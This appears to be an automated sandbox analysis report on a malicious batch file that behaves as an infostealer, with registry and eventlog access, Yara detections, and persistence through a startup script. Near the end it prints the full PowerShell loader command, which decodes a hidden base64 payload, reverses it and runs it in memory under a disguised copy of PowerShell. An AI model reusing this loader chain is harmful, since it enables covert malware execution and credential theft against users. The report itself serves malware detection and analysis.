Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Reads the System eventlog
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Found large BAT file
Source: ilZhNx3JAc.bat Static file information: 1411997
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA55B8 NtProtectVirtualMemory, 7_2_08AA55B8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA6E40 NtResumeThread, 7_2_08AA6E40
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA55B2 NtProtectVirtualMemory, 7_2_08AA55B2
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA6E38 NtResumeThread, 7_2_08AA6E38
Detected potential crypto function
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_0419F110 7_2_0419F110
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A810E0 7_2_08A810E0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A83690 7_2_08A83690
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A84210 7_2_08A84210
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A824A9 7_2_08A824A9
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A824B8 7_2_08A824B8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A810D2 7_2_08A810D2
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A885A0 7_2_08A885A0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A88590 7_2_08A88590
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A841FF 7_2_08A841FF
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A83680 7_2_08A83680
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A84208 7_2_08A84208
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A97490 7_2_08A97490
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9D518 7_2_08A9D518
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9C6E8 7_2_08A9C6E8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9C839 7_2_08A9C839
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9D977 7_2_08A9D977
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9F520 7_2_08A9F520
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9D507 7_2_08A9D507
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9C6DA 7_2_08A9C6DA
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA2D78 7_2_08AA2D78
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA1E48 7_2_08AA1E48
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA6154 7_2_08AA6154
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA9488 7_2_08AA9488
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA9478 7_2_08AA9478
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABD008 7_2_08ABD008
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB0040 7_2_08AB0040
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB19A3 7_2_08AB19A3
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABC328 7_2_08ABC328
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB0011 7_2_08AB0011
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB53EF 7_2_08AB53EF
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABBB68 7_2_08ABBB68
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABBB78 7_2_08ABBB78
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB64EF 7_2_08AB64EF
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB5400 7_2_08AB5400
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB6500 7_2_08AB6500
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABCFF8 7_2_08ABCFF8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7C940 7_2_08B7C940
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B78700 7_2_08B78700
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B738BA 7_2_08B738BA
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B70006 7_2_08B70006
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B70040 7_2_08B70040
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7DB48 7_2_08B7DB48
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7CC67 7_2_08B7CC67
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B79788 7_2_08B79788
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7977A 7_2_08B7977A
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08C70040 7_2_08C70040
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08C70019 7_2_08C70019
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08F0EB20 7_2_08F0EB20
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08F0DE88 7_2_08F0DE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02564AC0 8_2_02564AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02563EA8 8_2_02563EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_025641F0 8_2_025641F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_0256F600 8_2_0256F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FDADC8 8_2_05FDADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FDB4A8 8_2_05FDB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD6780 8_2_05FD6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FDE959 8_2_05FDE959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD88A8 8_2_05FD88A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD0040 8_2_05FD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD3390 8_2_05FD3390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD8FFB 8_2_05FD8FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD5988 8_2_05FD5988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_065B33D0 8_2_065B33D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD0006 8_2_05FD0006
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_00C3F110 16_2_00C3F110
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_06FB3098 16_2_06FB3098
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_06FB3052 16_2_06FB3052
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881C940 16_2_0881C940
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08818700 16_2_08818700
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_088138BA 16_2_088138BA
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881DB48 16_2_0881DB48
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881CC67 16_2_0881CC67
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08810012 16_2_08810012
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08810040 16_2_08810040
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08819788 16_2_08819788
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881977F 16_2_0881977F
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08910006 16_2_08910006
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08910040 16_2_08910040
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08BAEB20 16_2_08BAEB20
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08BADE88 16_2_08BADE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_01414AC0 18_2_01414AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_01413EA8 18_2_01413EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_014141F0 18_2_014141F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_0141F6D8 18_2_0141F6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B6780 18_2_062B6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062BB4A8 18_2_062BB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B3390 18_2_062B3390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B0040 18_2_062B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062BADC8 18_2_062BADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B88A8 18_2_062B88A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062BE959 18_2_062BE959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B8FFB 18_2_062B8FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B5988 18_2_062B5988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_06A333D0 18_2_06A333D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B001E 18_2_062B001E
Sample file is different than original file name gathered from version info
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000584E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTECHNICAL-SPECIFICATION.exeP vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNwxpdpym.dll" vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1365527547.00000000006DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004700000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1404676105.00000000088E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNwxpdpym.dll" vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1343010484.0000000000A94000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf.5.dr Binary or memory string: OriginalFilenamePowerShell.EXEj% vs ilZhNx3JAc.bat
Yara signature match
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 7.2.ilZhNx3JAc.bat.Dmf.8000000.9.raw.unpack, ExceptionServer.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, ZTFEpdjP8zw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, WnRNxU.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 2njIk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, I5ElxL.cs Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, QQSiOsa4hPS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, FdHU4eb83Z7.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winBAT@31/9@4/2
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar35we2c.lka.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\System32\chcp.com Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File read: C:\Users\user\Desktop\ilZhNx3JAc.bat Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
